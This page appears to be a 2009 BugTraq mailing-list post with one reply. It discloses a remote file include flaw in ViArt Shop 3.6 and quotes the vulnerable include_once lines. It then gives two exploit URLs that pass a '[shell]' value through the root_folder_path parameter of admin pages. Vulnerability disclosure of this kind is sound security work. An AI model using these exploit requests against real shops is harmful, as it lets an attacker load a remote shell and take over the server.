BugTraq
Back to list
|
Post reply
RFI Bug
Feb 16 2009 05:13PM
Dr linux gmx net
(1 replies)
ViArt Shop 3.6 Remote File Include BUG
FreeDownload : http://www.viart.com/tracking_downloads.php?fn=viart_shop-3.6.zip
#FOUND BY : Dr-Linux
#Mail : Dr.linux (at) gmx (dot) net [email concealed]
include_once($root_folder_path."includes/common.php");
include_once($root_folder_path . "includes/record.php");
Exploi >>> http://www.target/path/admin/admin_forgotten_password.php?root_folder_pa
th=[shell]
include_once($root_folder_path . "messages/" . $language_code . "/download_messages.php");
Exploit >>> http://www.target/path/admin/admin_admin.php?root_folder_path=[shell]
[ reply ]
Re: RFI Bug
Feb 17 2009 09:44AM
Francesco Laurita (francesco francesco-laurita info)
Privacy Statement
Copyright 2010, SecurityFocus
FreeDownload : http://www.viart.com/tracking_downloads.php?fn=viart_shop-3.6.zip
#FOUND BY : Dr-Linux
#Mail : Dr.linux (at) gmx (dot) net [email concealed]
include_once($root_folder_path."includes/common.php");
include_once($root_folder_path . "includes/record.php");
Exploi >>> http://www.target/path/admin/admin_forgotten_password.php?root_folder_pa
th=[shell]
include_once($root_folder_path . "messages/" . $language_code . "/download_messages.php");
Exploit >>> http://www.target/path/admin/admin_admin.php?root_folder_path=[shell]
[ reply ]